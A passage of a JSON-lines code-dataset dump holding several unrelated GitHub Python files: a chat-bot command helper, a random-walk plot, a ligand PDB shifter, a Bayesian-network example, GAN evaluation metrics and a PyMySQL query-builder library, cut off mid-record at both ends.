down!',ipAddress)\n return 1\n\n################################################################################\n","repo_name":"sathishsms/wowgic","sub_path":"common/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"97"} +{"seq_id":"15626460110","text":"from nonebot import on_command\n\nadd_moral = on_command(\"德育\", aliases={\"添加德育\"}, priority=100, block=True)\nexport_moral = on_command(\"导出德育\", priority=100, block=True)\nexport_moral_images = on_command(\"导入德育截图\", aliases={\"导出德育图片\"}, priority=100, block=True)\n\n\n__helper__ = [\n {\n \"cmd\": \"德育\",\n \"alias\": [\"添加德育\"],\n \"params\": [\"学生姓名(班干部使用)\", \"说明事件\", \"证明图片\"],\n \"tags\": [\"添加\", \"德育\", \"学生\"],\n \"use\": [\n [\"德育\", \"说明一下是什么事情吧\"],\n [\"参加学校活动 [图片]\", \"OK\"],\n [[\"如果你是干部,可以为另外的同学添加\", \"德育 张同学 李同学\"], \"说明一下什么事情吧!\"],\n [\"参加学校活动 [图片]\", \"OK\"],\n ],\n \"doc\": \"德育功能只有学生可以使用,如果你是班干部的话可以为另外的同学添加德育,为其它学生添加德育动用的是查找的方式添加\",\n },\n {\n \"cmd\": \"导出德育\",\n \"params\": [\"导出的年月日(不填写表示本月)\", \"班级名字(教师才需要填写)\"],\n \"tags\": [\"导出\", \"德育\", \"学生\", \"教师\"],\n \"use\": [\n [\"导出德育\", \"[文件.xlsx]\"],\n [[\"如果你是教师的情况下\", \"导出德育\"], \"选择班级[列表]\"],\n [\"人工智能2101\", \"[文件.xlsx]\"],\n [[\"您可以指定导出的年月日\", \"导出德育 12\"], \"[今年12月文件.xlsx]\"],\n ],\n \"doc\": \"教师和学生都可以导出,也可以指定年月日,比如2023 12表示年月,2023 12 12表示指定日子\",\n },\n]\n","repo_name":"ClassRobot/ClassRobot","sub_path":"src/plugins/morals/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"97"} +{"seq_id":"36115420616","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef randomwalk(largo):\r\n pasos=np.random.randint(-1,2,largo) \r\n return pasos.cumsum()\r\n\r\ndef caminata_mas_alejada(caminatas):\r\n caminata_alejada = []\r\n for caminata in caminatas:\r\n distancia = max(abs(caminata))\r\n caminata_alejada.append(distancia)\r\n return caminatas[caminata_alejada.index(max(caminata_alejada))]\r\n\r\n\r\n\r\ndef caminata_menos_alejada(caminatas):\r\n caminatas_puntaje = []\r\n for caminata in caminatas:\r\n acum = 0\r\n for distancia in caminata:\r\n acum += distancia\r\n caminatas_puntaje.append(abs(acum))\r\n return caminatas[caminatas_puntaje.index(min(caminatas_puntaje))]\r\n \r\n\r\n\r\nN = 100000\r\n\r\ncaminatas = []\r\nfig = plt.figure()\r\nplt.subplot(2, 1, 1)\r\nfor i in range(12):\r\n caminata = randomwalk(N)\r\n plt.plot(caminata)\r\n caminatas.append(caminata)\r\nprint(sum(caminatas))\r\nplt.title(\"12 Caminatas al azar\")\r\nplt.xticks([])\r\nplt.ylim(-500.0, 500.0)\r\n\r\n\r\nplt.subplot(2,2,3)\r\nplt.title(\"Camino más alejado\")\r\nplt.plot(caminata_mas_alejada(caminatas))\r\nplt.xticks([])\r\nplt.ylim(-500.0, 500.0)\r\n\r\nplt.subplot(2,2,4)\r\nplt.title(\"Camino menos alejado\")\r\nplt.plot(caminata_menos_alejada(caminatas))\r\nplt.xticks([])\r\nplt.ylim(-500.0, 500.0)\r\nplt.show()\r\n\r\n# %%\r\n","repo_name":"LucianoArgolo22/Python-Programming-Course","sub_path":"Clase07/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"37852157151","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 5 13:27:41 2017\n\n@author: athar\n\"\"\"\nimport ssdu_utils as sutils\nimport sys\n\nrec_file = sys.argv[1]\nlig_file = sys.argv[2]\n\nwith open(lig_file) as f:\n ligLines = f.read().splitlines()\n \nwith open(rec_file) as f:\n recLines = f.read().splitlines()\n \nsutils.shiftLigAtomsSerial(recLines, ligLines)\nwith open('new_lig.pdb', 'w') as out_file:\n out_file.write('\\n'.join(ligLines))","repo_name":"athar71/Dimer-Classification","sub_path":"shift_ligand.py","file_name":"shift_ligand.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"32163261935","text":"from NeticaPy import Netica\nN=Netica()\nmesg=bytearray()\nenv=N.NewNeticaEnviron_ns(b\"\",None,b\"\")\n#env = N.NewNeticaEnviron_ns (b\"\",None,b\"\")\nres = N.InitNetica2_bn (env, mesg)\n\nprint(mesg.decode(\"utf-8\"))\n\nnet = N.NewNet_bn (b\"Convertion\", env)\n\nconverted = N. NewNode_bn (b\"Converted\", 2, net)\nemail = N.NewNode_bn (b\"Email\", 2, net)\ncompany = N.NewNode_bn (b\"Company\", 2, net)\njobTitle = N.NewNode_bn (b\"Job_Title\", 2, net)\npurpose = N.NewNode_bn (b\"Purpose\", 2, net)\nactivity = N.NewNode_bn (b\"Activity\", 2, net)\n\n\nN.SetNodeStateNames_bn (converted,b\"Yes, No\")\nN.SetNodeStateNames_bn (email, b\"Specific, Generic\")\nN.SetNodeStateNames_bn (company, b\"Specified, Not_Specified\")\nN.SetNodeStateNames_bn (jobTitle, b\"Present, Absent\")\nN.SetNodeStateNames_bn (purpose, b\"Specified, Not_Specified\")\nN.SetNodeStateNames_bn (activity, b\"Occured, Not_Occured\")\n\nnode_variables = {\n b\"Email\" : [b\"Specific\", b\"Generic\"],\n b\"Company\" : [b\"Specified\",b\"Not_Specified\"],\n b\"Job_Title\" : [b\"Present\", b\"Absent\"],\n b\"Purpose\" : [b\"Specified\",b\"Not_Specified\"],\n b\"Activity\" : [b\"Occured\", b\"Not_Occured\"]\n }\nnode_names=list(node_variables)\n\nN.AddLink_bn (converted, email)\nN.AddLink_bn (converted, company)\nN.AddLink_bn (converted, jobTitle)\nN.AddLink_bn (converted, purpose)\nN.AddLink_bn (converted, activity)\n\n\nN.SetNodeProbs (converted, 0.1302, 0.8698)\n\nN.SetNodeProbs (email, b\"Yes\", 0.8394, 0.1606)\nN.SetNodeProbs (email, b\"No\", 0.5895, 0.4105)\n\nN.SetNodeProbs (company, b\"Yes\", 0.6451, 0.3549)\nN.SetNodeProbs (company, b\"No\", 0.1864, 0.8136)\n\nN.SetNodeProbs (jobTitle, b\"Yes\", 0.6155, 0.3845)\nN.SetNodeProbs (jobTitle, b\"No\", 0.1697, 0.8303)\n\nN.SetNodeProbs (purpose, b\"Yes\", 0.40282, 0.59718)\nN.SetNodeProbs (purpose, b\"No\", 0.13177, 0.86823)\n\nN.SetNodeProbs (activity, b\"Yes\", 1.0, 0.0)\nN.SetNodeProbs (activity, b\"No\", 0.32406, 0.67594)\n\nN.CompileNet_bn (net)\n\n#belief = N.GetNodeBelief (b\"Converted\", b\"Yes\", net)\n#print \"\"\"The probability of convertion is %g\"\"\"% belief\n\n#for i in range(32):\n# x=map(int,bin(31-i)[2:].zfill(5))\n# msg=\"Given \"\n# N.CompileNet_bn(net)\n# for j in range(5):\n# N.EnterFinding (node_names[j], node_variables[node_names[j]][x[j]], net)\n# msg+=\"%s[%s], b\" % (node_names[j], node_variables[node_names[j]][x[j]])\n# belief = N.GetNodeBelief (b\"Converted\", b\"Yes\", net)\n# print msg,b\"the probability of convertion is %s\"% belief\n\nmsg= \"Given \"\nfor j in range(5):\n print(\"Choise for %s:\\n-1 : Unknown\" % node_names[j].decode('utf-8'))\n for k in range(len(node_variables[node_names[j]])):\n print(k,\" : \",node_variables[node_names[j]][k].decode('utf-8'))\n i = eval(input(\"Enter choice: \"))\n if i>=0 and i 0:\n\n cursor.execute(\n \"INSERT INTO public.source_crawls(source_key, last_scrape, last_diff) \"\n \"VALUES(%s, %s, %s) \"\n \"ON CONFLICT (source_key) \"\n \"DO UPDATE SET \"\n \"last_scrape = %s, \"\n \"last_diff = %s, \"\n \"last_update = NOW()\",\n (news_source, text, diff_string, text, diff_string))\n else:\n cursor.execute(\n \"INSERT INTO public.source_crawls(source_key, last_scrape) \"\n \"VALUES(%s, %s) \"\n \"ON CONFLICT (source_key) \"\n \"DO UPDATE SET \"\n \"last_scrape = %s, \"\n \"last_update = NOW()\",\n (news_source, text, text))\n connection.commit()\n\n\ndef create_db():\n return PostgresSource()\n","repo_name":"robjailall/stock_news_notifier","sub_path":"dbs/postgres_db.py","file_name":"postgres_db.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"19544692439","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 2 17:53:46 2022\n\n@author: brochetc\n\nmetrics version 2\n\nFile include :\n \n metric2D and criterion2D APIs to be used by Trainer class from trainer_horovod\n provide a directly usable namespace from already implemented metrics\n\n\"\"\"\n\nimport metrics4arome.general_metrics as GM\nimport metrics4arome.wasserstein_distances as WD\nimport metrics4arome.sliced_wasserstein as SWD\nimport metrics4arome.spectrum_analysis as Spectral\nimport metrics4arome.inception_metrics as inception\nimport metrics4arome.scattering_metric as scat\nimport metrics4arome.structure_functions as sfunc\nimport metrics4arome.multivariate as multiv\nimport metrics4arome.length_scales as ls\nimport metrics4arome.quantiles_metric as quant\n\n\n###################### standard parameters\n\nvar_dict={'rr' : 0, 'u' : 1, 'v' : 2, 't2m' : 3 , 'orog' : 4}\n\nvar_dict_fake = {'u' : 0 , 'v' : 1, 't2m' : 2, 'orog' : 3}\n\nvars_wo_orog = ['u', 'v', 't2m']\n\n######################\n\n########################### High level APIs ##################################\n\nclass metric2D():\n def __init__(self,long_name, func, variables, names = 'metric'):\n \n \n \n self.long_name = long_name\n \n self.names = names # names for each of the func's output items\n \n self.func = func #should return np.array OR tensor to benefit from parallel estimation\n \n self.variables = variables # variables on which the metric is applied\n \n def selectVars(self, *args) :\n \n \"\"\"\n select in the input data the variables to compute metric on\n \"\"\"\n \n if len(args[0])==2 :\n \n real_data, fake_data = args[0]\n \n VI = [var_dict[v] for v in self.variables]\n VI_f = [var_dict_fake[v] for v in self.variables]\n \n real_data = real_data[:, VI,:,:]\n \n fake_data = fake_data[:, VI_f,:,:]\n \n return real_data, fake_data\n \n else :\n \n return args[0]\n \n\n def __call__(self, *args, **kwargs):\n \n \n ########## selecting variables check #########\n try :\n select = kwargs['select']\n except KeyError :\n \n select = True\n \n ############# selection ################\n \n if select :\n \n data = self.selectVars(args)\n \n else :\n \n data = args\n \n ########### computation ################\n\n reliq_kwargs ={ k :v for k,v in kwargs.items() if k!='select'}\n \n if len(data) == 2:\n \n return self.func(data[0], data[1] ,**reliq_kwargs)\n \n else :\n \n return self.func(data[0], **reliq_kwargs)\n \n#################\n#################\n \nclass criterion2D(metric2D):\n def __init__(self, long_name, func, variables):\n super().__init__(long_name, func, variables)\n\n##############################################################################\n ################## Metrics catalogue #####################\n \nstandalone_metrics = {'spectral_compute', 'struct_metric','ls_metric', 'IntraMapVariance',\n 'InterMapVariance'}\n\ndistance_metrics = {'Orography_RMSE', 'W1_Center', \"W1_Center_NUMPY\", \"W1_random\",\n \"W1_random_NUMPY\",\n \"pw_W1\",\n \"SWD_metric\", \"SWD_metric_torch\",\"fid\",\"scat_SWD_metric\",\n \"scat_SWD_metric_renorm\", \"multivar\", \"quant_metric\"}\n\n\n###################### Usable namespace #######################################\n \nOrography_RMSE = metric2D('RMS Error on orography synthesis ',\\\n GM.orography_RMSE,'orog')\n\nIntraMapVariance = metric2D('Mean intra-map variance of channels ',\\\n GM.intra_map_var,\n vars_wo_orog,names = ['intra_u', 'intra_v', 'intra_t2m'])\nInterMapVariance = metric2D('Mean Batch variance of channels ', \\\n GM.inter_map_var,\n vars_wo_orog, names = ['inter_u', 'inter_v', 'inter_t2m'])\n\n## crude Wasserstein distances\n\nW1_Center = criterion2D('Mean Wasserstein distance on center crop ',\\\n WD.W1_center, vars_wo_orog)\n\n\nW1_Center_NUMPY = criterion2D('Mean Wasserstein distance on center crop ',\\\n WD.W1_center_numpy, vars_wo_orog)\n\nW1_random = criterion2D('Mean Wasserstein distance on random selection ',\\\n WD.W1_random, vars_wo_orog)\n\nW1_random_NUMPY = criterion2D('Mean Wasserstein distance on random selection ',\\\n WD.W1_random_NUMPY, vars_wo_orog)\n\npw_W1 = metric2D('Point Wise Wasserstein distance', WD.pointwise_W1,\\\n vars_wo_orog)\n\n\n\n# Sliced Wasserstein Distance estimations\n\nsliced_w1 = SWD.SWD_API(image_shape=(128,128), numpy=True)\nSWD_metric = metric2D('Sliced Wasserstein Distance ',\\\n sliced_w1.End2End,\\\n vars_wo_orog, names=sliced_w1.get_metric_names())\n\nsliced_w1_torch = SWD.SWD_API(image_shape=(128,128), numpy=False)\nSWD_metric_torch = metric2D('Sliced Wasserstein Distance ',\\\n sliced_w1_torch.End2End,\\\n vars_wo_orog, names=sliced_w1_torch.get_metric_names())\n\n# spectral analysis\n\nspectral_dist = metric2D('Power Spectral Density RMSE ',\\\n Spectral.PSD_compare, vars_wo_orog)\n\nspectral_compute = metric2D('Power Spectral Density ',\\\n Spectral.PowerSpectralDensity, vars_wo_orog)\n\n\n\n# scattering metrics with sparsity and shape estimators\n\n\nscat_sparse = scat.scattering_metric(\n J=4,L=8,shape=(127,127), estimators=['s21', 's22'],\n frontend='torch', backend='torch', cuda=True\n )\n#two versions of the same metric with different calculation processes (see file)\n\nscat_SWD_metric = metric2D('Scattering Estimators ', scat_sparse.scattering_sliced,\\\n vars_wo_orog)\n\nscat_SWD_metric_renorm = metric2D('Scattering Estimator', scat_sparse.scattering_renorm,\n vars_wo_orog)\n\n# structure functions \n\nstruct_metric = metric2D('First order structure function', \n lambda data : sfunc.increments(data, max_length = 16),\\\n vars_wo_orog)\n\n#multivariate_comparisons\nmultivar = metric2D('Multivariate data', multiv.multi_variate_correlations,\\\n vars_wo_orog, names=['Corr_f','Corr_r'])\n\n# Correlation length maps\n\nscale = 2.5\nls_metric = metric2D('Correlation length maps', lambda data : ls.length_scale(data, sca =scale),\\\n vars_wo_orog)\n\n# quantile scores\n\nqlist = [0.01,0.1,0.9,0.99]\n\nquant_metric = metric2D('Quantiles RMSE score', lambda real, fake : quant.quantile_score(real, fake, qlist = qlist), \\\n vars_wo_orog)\n","repo_name":"flyIchtus/multivariate-GAN","sub_path":"gan_horovod/metrics4arome/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7020,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"720822852","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport copy\nimport traceback\nimport re\nimport pymysql\nfrom pymysql.cursors import DictCursor, SSCursor, SSDictCursor, Cursor as DefaultCursor\ntry:\n from dbutils.pooled_db import PooledDB\nexcept:\n from DBUtils.PooledDB import PooledDB\nfrom typing import Iterable, List, Tuple, Union\nfrom pymysql.constants import CLIENT\nimport logging\nlogger = logging.getLogger(__name__)\nlogger.setLevel(level=logging.INFO)\nhandler = logging.StreamHandler()\nhandler.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s -%(name)s.py -[%(levelname)s] - %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\nclass OperationError(Exception):\n \"\"\"\n 用来查询失败时装填错误信息,同时使其bool值为False 方便识别是正常结果还是错误\n \"\"\"\n\n def __bool__(self):\n return False\n\n\nclass Like(object):\n \"\"\"\n 用来构造 like 语句\n \"\"\"\n\n def __init__(self, string: str) -> None:\n if '%' in string:\n string = string.replace('%', '%%%%')\n else:\n string = '%%' + string+'%%'\n\n self.string = string\n\n def __repr__(self):\n return self.string\n\n\nclass SqlGenerator(object):\n \"\"\"\n 该类下的方法的返回值必须为两个 \n 第一个是sql,第二个是参数\n \"\"\"\n\n @classmethod\n def get_all_column_sql(cls, table_name, dbname=None):\n \"\"\"返回对应表的所有字段\"\"\"\n\n table_name = table_name if not dbname else dbname+\".\"+table_name\n sql = \"SELECT COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=%s order by COLUMN_NAME;\"\n return sql, (table_name,)\n\n @classmethod\n def generate_select_sql(cls, columns: Union[Tuple[str], List[str], str] = 'id', table: str = None, where=str or dict, group_by: str = None,\n order_by: str = None, limit: int = None, offset: int = None):\n \"\"\"\n 设要查询两个字段id和name,则 columns 为('id','name') / ['id','name'] / 'id,name'\n 要查询所有字段 使用 columns='*' 即可\n\n where 为字典 或字符串\n \"\"\"\n assert table, \"table不能为空\" # table 不能为空。但是参数里为了做到字段在前,table参数只能也设默认值为None\n columns = columns if isinstance(columns, str) else ','.join(columns)\n\n sql = \"SELECT {} from `{}` \".format(columns, table)\n params = None\n if where:\n where_tags, where_param = cls.generate_where_sql(where)\n sql += \"where {}\".format(where_tags)\n params = where_param\n\n for key, fs in ((group_by, 'group by'), (order_by, 'order by'), (limit, 'limit'), (offset, 'offset')):\n if key:\n sql += ' {} {}'.format(fs, key)\n\n return sql, params\n\n @classmethod\n def _get_after_format_sql(cls, init_sql, table, data: dict or List[dict], columns: Union[Tuple[str], List[str], str] = None):\n \"\"\"\n 生成sql语句里需要插入的字段和对应的格式化符号\n @columns: 需要格式化的字段。默认去第一个传入的字典数据的键值对\n \"\"\"\n if isinstance(columns, str):\n columns = (columns,)\n if not columns:\n if isinstance(data, dict):\n columns = data.keys()\n else:\n columns = data[0].keys()\n\n format_tags = ','.join(('%({})s'.format(col) for col in columns))\n final_sql = init_sql.format(table, '`'+'`,`'.join(columns)+'`', format_tags)\n return final_sql, data\n\n @classmethod\n def generate_insert_sql(cls, table, data: dict or List[dict], columns: Union[Tuple[str], List[str], str] = None, ignore=False, on_duplicate_key_update: str = None):\n \"\"\"\n columns 为 可迭代对象 list/tuple/set/...\n 插入单条数据,condition为字典形式的数据\n data 必须为字典 或者 为一个元素类型为字典的列表\n \"\"\"\n sql = 'INSERT INTO `{}` ({}) VALUES ({})' if not ignore else 'INSERT IGNORE INTO {} ({}) VALUES ({})'\n if on_duplicate_key_update:\n sql += (\" on duplicate key update \"+on_duplicate_key_update)\n return cls._get_after_format_sql(sql, table, data, columns)\n\n @classmethod\n def generate_replace_into_sql(cls, table, data: dict or List[dict], columns: Union[Tuple[str], List[str], str] = None):\n \"\"\"\n columns 字段顺序。如果不传入,则���第一个data的 键集合\n \"\"\"\n sql = 'REPLACE INTO `{}` ({}) VALUES ({}) '\n return cls._get_after_format_sql(sql, table, data, columns)\n\n @classmethod\n def generate_update_sql_by_primary(cls, table, data: dict or List[dict], pri_value, columns: Union[Tuple[str], List[str], str] = None, primary: str = 'id'):\n \"\"\"\n 更新单条数据,condition为字典形式的数据\n columns 为 可迭代对象 list/tuple/set/...\n \"\"\"\n sql = 'UPDATE `{}` SET {} WHERE `{}`=%s'\n if isinstance(columns, str):\n columns = (columns,)\n else:\n if not columns:\n columns = data.keys()\n\n param = tuple(data[k] for k in columns)\n columns_condi = ','.join(['`' + k + '`' + '=%s' for k in columns])\n\n sql = sql.format(table, columns_condi, primary)\n param += (pri_value,)\n return sql, param\n\n @classmethod\n def generate_where_sql(cls, condition):\n assert isinstance(condition, (str, dict)), \"构造where条件的参数必须为字符串或 字典\"\n where_tags = []\n condition_param = []\n if isinstance(condition, str):\n where_tags = condition\n else:\n for key, value in condition.items():\n if isinstance(value, tuple) and len(value) == 2: # 大于小于\n where_tags.append('( `{}` >=%s and `{}` <=%s )'.format(key, key))\n condition_param.extend([value[0], value[1]])\n elif isinstance(value, list):\n if not value:\n continue\n where_tags.append(' `{}` in ({}) '.format(key, ','.join(['%s'] * len(value))))\n condition_param.extend(value)\n elif isinstance(value, Like):\n where_tags.append(\" `{}` like '{}' \".format(key, value))\n else:\n where_tags.append(' `{}`= %s'.format(key))\n condition_param.append(value)\n\n where_tags = ' AND '.join(where_tags)\n return where_tags, tuple(condition_param)\n\n @classmethod\n def generate_update_sql(cls, table, data: dict, where: str or dict , columns: Union[Tuple[str], List[str], str] = None, limit=None):\n \"\"\"\n @data:新数据 例如 data= {'name':'jack', 'age':18,'school':'MIT' } --> update xx set name='jack',age=18,school='MIT' \n @where 为dict时,会根据这个dict 转换为对应的where条件。 如传入 {'age':24} ---> update xx set name='jack',age=18,school='MIT' where age=24\n --> str : age=88 update xx set name='jack',age=18,school='MIT' where age=88\n 更新必须传入条件,避免漏传条件导致全表被更新\n \"\"\"\n sql = 'UPDATE `{}` SET {} WHERE {}'\n if isinstance(columns, str):\n columns = (columns,)\n if not columns:\n columns = data.keys()\n set_tags = ','.join(('`{}`=%s'.format(col, col) for col in columns))\n param = tuple(data[k] for k in columns)\n where_tags, where_param = cls.generate_where_sql(where)\n param += where_param\n if limit:\n param += (limit,)\n sql += ' limit %s'\n final_sql = sql.format(table, set_tags, where_tags)\n return final_sql, param\n\n @classmethod\n def generate_delete_sql(cls, table, where: str or dict, limit: int = None):\n sql = \"DELETE FROM `{}` WHERE {} \"\n where_tags, where_param = cls.generate_where_sql(where)\n sql = sql.format(table, where_tags)\n if limit:\n sql += \"limit {}\".format(limit)\n return sql, where_param\n\n\nclass MysqlSqler(SqlGenerator):\n\n def generate_merge_sql(self, table, data: dict or List[dict], columns: Union[Tuple[str], List[str], str] = None, merge_columns: Union[Tuple[str], List[str], str] = None):\n \"\"\"\n columns 为需要插入的字段\n merge_columns 为 出现重复时需要更新的字段.如果不给值,将会把所有 columns 里的字段都更新\n 如果columns 都没有值,将会读取所有data的 键值对\n \"\"\"\n if isinstance(columns, str):\n columns = (columns,)\n if not columns:\n columns = data.keys() if isinstance(data, dict) else data[0].keys()\n\n format_tags = ','.join(('%({})s'.format(col) for col in columns))\n if isinstance(merge_columns, str):\n merge_columns = (merge_columns,)\n if not merge_columns:\n merge_columns = columns\n update_str = ','.join(['`{}`=values(`{}`)'.format(col, col) for col in merge_columns])\n sql = \"INSERT INTO `{}` ({}) values({}) on duplicate key update {};\"\n return sql.format(table, '`'+'`,`'.join(columns)+'`', format_tags, update_str), data\n\n\nclass _SimpleConnector(SqlGenerator):\n\n logger = logger\n charset = 'utf8'\n cursor_class = DefaultCursor\n _primary_key_cache = dict() # 用来缓存表的主键\n\n def _set_conn_var(self, **kwargs):\n if kwargs.get('conn_cmd', None):\n connargs = self.get_conn_args_from_str(kwargs['conn_cmd'])\n del kwargs['conn_cmd']\n else:\n connargs = {'user': 'root', 'port': 3306, 'charset': self.charset}\n connargs.update(kwargs)\n\n connargs['port'] = int(connargs['port'])\n self.host = connargs['host']\n self.user = connargs['user']\n self.port = int(connargs['port'])\n self.password = connargs['password']\n self.charset = connargs.get('charset', 'utf8')\n db = connargs.get('db', None)\n self.database = db if db else connargs['database']\n return connargs\n\n def _choose_cursor_class(self, connargs: dict):\n \"\"\"\n 选择实例化连接时 选择的游标类型。 也可以在执行语句时自行选择。\n \"\"\"\n cursor_class = DefaultCursor\n if 'cursorclass' in connargs.keys():\n cursor_class = connargs['cursorclass']\n else:\n if 'cursor_type' in connargs.keys():\n cursor_type = connargs.get('cursor_type', None)\n del connargs['cursor_type']\n assert isinstance(cursor_type, str), \"cursor_type must in (ss,dcit,ssdict) \"\n cursor_type = cursor_type.lower()\n if cursor_type == 'ss':\n cursor_class = SSCursor\n elif cursor_type == 'dict':\n cursor_class = DictCursor\n elif cursor_type == 'ssdict':\n cursor_class = SSDictCursor\n connargs['cursorclass'] = cursor_class\n self.cursor_class = cursor_class\n return connargs\n\n def __init__(self, **kwargs):\n connargs = self._set_conn_var(**kwargs)\n self.connargs = self._choose_cursor_class(connargs)\n self.connector = pymysql.connect(**connargs)\n\n def get_conn_args_from_str(self, string):\n \"\"\"\n @string : mysql-client命令 mysql -h127.0.0.1 -p1234 -uroot -p123456 -Dtest_base \n 返回 参数字典 { \"host\":\"127.0.0.1\",\"port\":1234,\"password\":\"123456\",\"db\":\"test_base\" }\n \"\"\"\n conn_args = dict()\n patter_dict = {\n \"host\": \"-h\\s*?([\\d\\.]+)\",\n \"port\": \"-P\\s*?(\\d+)\",\n \"user\": \"-u\\s*?(\\S+)\",\n \"password\": \"-p\\s*?(\\S+)\",\n \"database\": \"-D\\s*?(\\S+)\",\n }\n for k, v in patter_dict.items():\n result = re.findall(v, string)\n number = len(result)\n if number == 1:\n conn_args[k] = result[0]\n else:\n if k == 'port':\n conn_args[k] = 3306\n elif k == 'user':\n conn_args[k] = 'root'\n elif k == 'host':\n conn_args[k] = 'localhost'\n else:\n raise ValueError(\"解析连接命令失败,确认命令符合 mysql -uxxx -Pxxxx -pxxxx -hxxxx -Dxxxx 格式 \")\n\n return conn_args\n\n def _get_connection(self):\n return self.connector\n\n def _get_cursor(self, connnetion, cursor_type=None):\n if not cursor_type:\n return connnetion.cursor(self.cursor_class)\n if cursor_type == 'dict':\n return connnetion.cursor(DictCursor)\n elif cursor_type == 'ss':\n return connnetion.cursor(SSCursor)\n elif cursor_type == 'ssdict':\n return connnetion.cursor(SSDictCursor)\n return connnetion.cursor(DefaultCursor) # default\n\n def read_ss_result(self, sql, param: Union[tuple, dict, List[tuple], List[dict]] = None, cursor_type: str = 'ss'):\n \"\"\"\n 读取流式游标的结果\n \"\"\"\n conn = self._get_connection()\n assert cursor_type.lower() in ('ss', 'ssdict'), \"此处只支持流式游标 ss或ssdict\"\n cursor = self._get_cursor(conn, cursor_type)\n try:\n count = cursor.executemany(sql, param) if isinstance(param, list) else cursor.execute(sql, param)\n # conn.commit()\n result = cursor.fetchone()\n while result is not None:\n yield result\n result = cursor.fetchone()\n cursor.close()\n except Exception as e:\n conn.rollback()\n traceback.print_exc()\n return OperationError(e)\n\n def execute_sql(self, sql: str, param: Union[tuple, dict, List[tuple], List[dict]] = None, cursor_type: str = None):\n \"\"\"\n 核心方法,执行sql\n # cursor_type为游标类型(默认返回值为元祖类型),可选字典游标,将返回数据的字典形式\n # 此方法应直接返回 所有结果,不应去考虑fetchone还是fetchmany的问题。这是传入的sql中就应该限定的\n 注意此方法 返回两个值\n 如果参数是列表类型,则使��executemany方法 \n \"\"\"\n conn = self._get_connection()\n cursor = self._get_cursor(conn, cursor_type)\n result = count = False\n try:\n count = cursor.executemany(sql, param) if isinstance(param, list) else cursor.execute(sql, param) # 得到受影响的数据条数\n conn.commit()\n result = cursor.fetchall() # 此方法应直接返回 所有结果,不应去考虑fetchone还是fetchmany的问题。这是传入的sql中就应该限定的\n except Exception as e:\n self.logger.warning(\"---------------------------------\")\n self.logger.error(str(e))\n self.logger.error(sql)\n # self.logger.error(param) #参数太长了,不要打印\n self.logger.error(traceback.format_exc())\n self.logger.info(\"---------------------------------\")\n conn.rollback()\n result = count = OperationError(e)\n finally:\n return result, count\n\n def execute_with_return_id(self, sql: str, param: Union[tuple, dict, List[tuple], List[dict]] = None):\n \"\"\"\n 此方法会返回插入的最后一行的id\n \"\"\"\n conn = self._get_connection()\n cursor = self._get_cursor(conn)\n result = False\n try:\n r = cursor.executemany(sql, param) if isinstance(param, list) else cursor.execute(sql, param)\n cursor.execute(\"SELECT LAST_INSERT_ID() AS id\")\n result = cursor.fetchall()[0][0]\n conn.commit()\n except Exception as e:\n self.logger.info(\"---------------------------------\")\n self.logger.error(sql)\n # self.logger.error(param)\n self.logger.info(\"---------------------------------\")\n conn.rollback()\n traceback.print_exc()\n result = OperationError(e)\n finally:\n return result\n\n def do_transaction(self, sql_params: List[Tuple[str, tuple]], cursor_type: str = None):\n \"\"\"\n 执行事务:传入sql和params 列表 ,如下\n [ \n ( 'insert into a (`id`) values(%s)', (1,) ),\n ('update a set `id`= %s' where `id`=%s', (2,3) ) \n ]\n sql_params 内的元素类型为 tuple 对应 ---> (sql,params) , 其中 如果params 类型为list,则会使用启用游标的executemany 去执行\n 返回最后一条sql的执行结果\n \"\"\"\n conn = self._get_connection()\n cursor = self._get_cursor(conn, cursor_type=cursor_type)\n result = count = False\n try:\n for sql, param in sql_params:\n count = cursor.executemany(sql, param) if isinstance(param, list) else cursor.execute(sql, param)\n result = cursor.fetchall()\n conn.commit()\n except Exception as e:\n conn.rollback()\n traceback.print_exc()\n result = count = OperationError(e)\n finally:\n return result, count\n\n def select(self, columns: Union[Tuple[str], List[str], str] , table: str , where: str or dict = None,\n group_by: str = None, order_by: str = None, limit: int = None, offset: int = None, **kwargs):\n \"\"\"\n 仅支持 简单的查询\n \"\"\"\n sql, param = self.generate_select_sql(columns, table, where, group_by, order_by, limit, offset)\n return self.execute_sql(sql, param, **kwargs)[0]\n\n def insert_into(self, table: str, data: dict or List[dict], columns: Union[Tuple[str], List[str], str] = None, ignore=False, on_duplicate_key_update: str = None, return_id=False, **kwargs):\n \"\"\"\n @data: 字典或字典列表(批量插入) \n @columns: 哪些字段需要被插入。默认是传入的data的所有键。当data中有多余字段时,可以通过columns指定哪些字段需要作为新数据的字段插入\n @ignore: 是否 insert ignore into \n @on_duplicate_key_update:出现 重复时的处理 ,如 插入一条数据出现重复时,令name字段等于“重复“ 则传入 on_duplicate_key_update= ”name='重复'“ 即可\n @return_id: True ->返回最后一条插入语句的id ,默认False 返回受影响的条数\n \"\"\"\n sql, param = self.generate_insert_sql(table, data, columns, ignore, on_duplicate_key_update)\n return self.execute_with_return_id(sql, param, **kwargs) if return_id else self.execute_sql(sql, param, **kwargs)[1]\n\n def replace_into(self, table: str, data: dict or list, columns: Union[Tuple[str], List[str], str] = None, **kwargs):\n \"\"\"\n 